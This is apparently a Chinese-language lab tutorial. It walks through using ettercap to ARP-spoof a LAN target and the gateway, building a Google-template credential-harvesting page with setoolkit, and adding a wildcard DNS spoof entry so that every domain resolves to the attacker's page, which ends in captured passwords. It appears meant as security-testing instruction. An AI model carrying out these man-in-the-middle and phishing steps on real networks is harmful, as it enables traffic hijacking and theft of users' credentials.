简介

这次主要是使用ettercap在局域网中发现主机并欺骗其arp表,让其mac地址与攻击主机mac一致,使用dns污染其dns解析,将其访问的域名解析到本机的钓鱼网站中。

注意!
ettercap使用要一次完成,在多次测试中发现,重新arp欺骗会无法生效,原因不知。

步骤

发现局域网主机

在kali中打开ettercap

1
ettercap -G

upload successful

选择对应的接口,点击√号,再点击放大镜,再点击服务器
upload successful

192.168.0.1:网关
192.168.0.197:靶机

arp欺骗

点击靶机,再点击add to target1
点击网关,再点击add to target2
upload successful

点击地球图标,点击arp poisoning,点击ok
upload successful
upload successful

可在靶机上查看arp表,发现网关mac和本机mac一致,欺骗成功;但是访问正常,可能会短暂无法访问互联网。

制作钓鱼网站

使用setoolkit社工软件制作

1
setoolkit

来个好看的封面
upload successful

选择1
upload successful

1
2
3
4
5
6
7
8
1)Social-Engineering Attacks:社会工程学攻击
2)Penetration Testing(Fast-Track):渗透测试(快速通道)
3)Third Party Modules:第三模块
4)Update the Social-Engineer Toolkit:更新社会工程学工具包
5)Update SET configuration:更新SET配置
6)Help, Credits, and About:帮助、致谢和关于

99)Exit the Social-Engineer Toolkit:退出

选择2
upload successful

1
2
3
4
5
6
7
8
9
10
11
12
1)鱼叉式网络钓鱼攻击向量
2)网站攻击向量
3)感染性媒体生成器
4)创建载荷和监听器
5)批量邮件攻击
6)基于Arduino的攻击向量
7)无线接入点攻击向量
8)QR码生成器攻击向量
9)PowerShell攻击向量
10)第三方模块

99)返回主菜单。

选择3
upload successful

1
2
3
4
5
6
7
8
9
1)Java小程序攻击方法
2)Metasploit浏览器漏洞利用方法
3)凭证收集攻击方法
4)Tabnabbing攻击方法
5)Web劫持攻击方法
6)多攻击网络方法
7)HTA攻击方法

99)返回主菜单

随意,我这里选择1,比较方便
upload successful

1
2
3
4
5
1)网络模板
2)网站克隆器
3)自定义导入

99)返回网络攻击菜单

然后输入要被访问的ip,选择谷歌模板,网站制作完成。
upload successful

dns劫持

配置ettercap的dns劫持配置文件

1
vim /etc/ettercap/etter.dns

末尾添加以下内容

1
*	A	192.168.0.194

意思是所有域名均解析成后面的ip
upload successful

点击软件三个点,然后选择plugins,再选择manage plugins
upload successful

双击dns_spoof即可
upload successful

验证

因为创建的是80端口的页面,靶机要输入http://+域名

upload successful

工具会有劫持成功的返回

upload successful

拿到密码

upload successful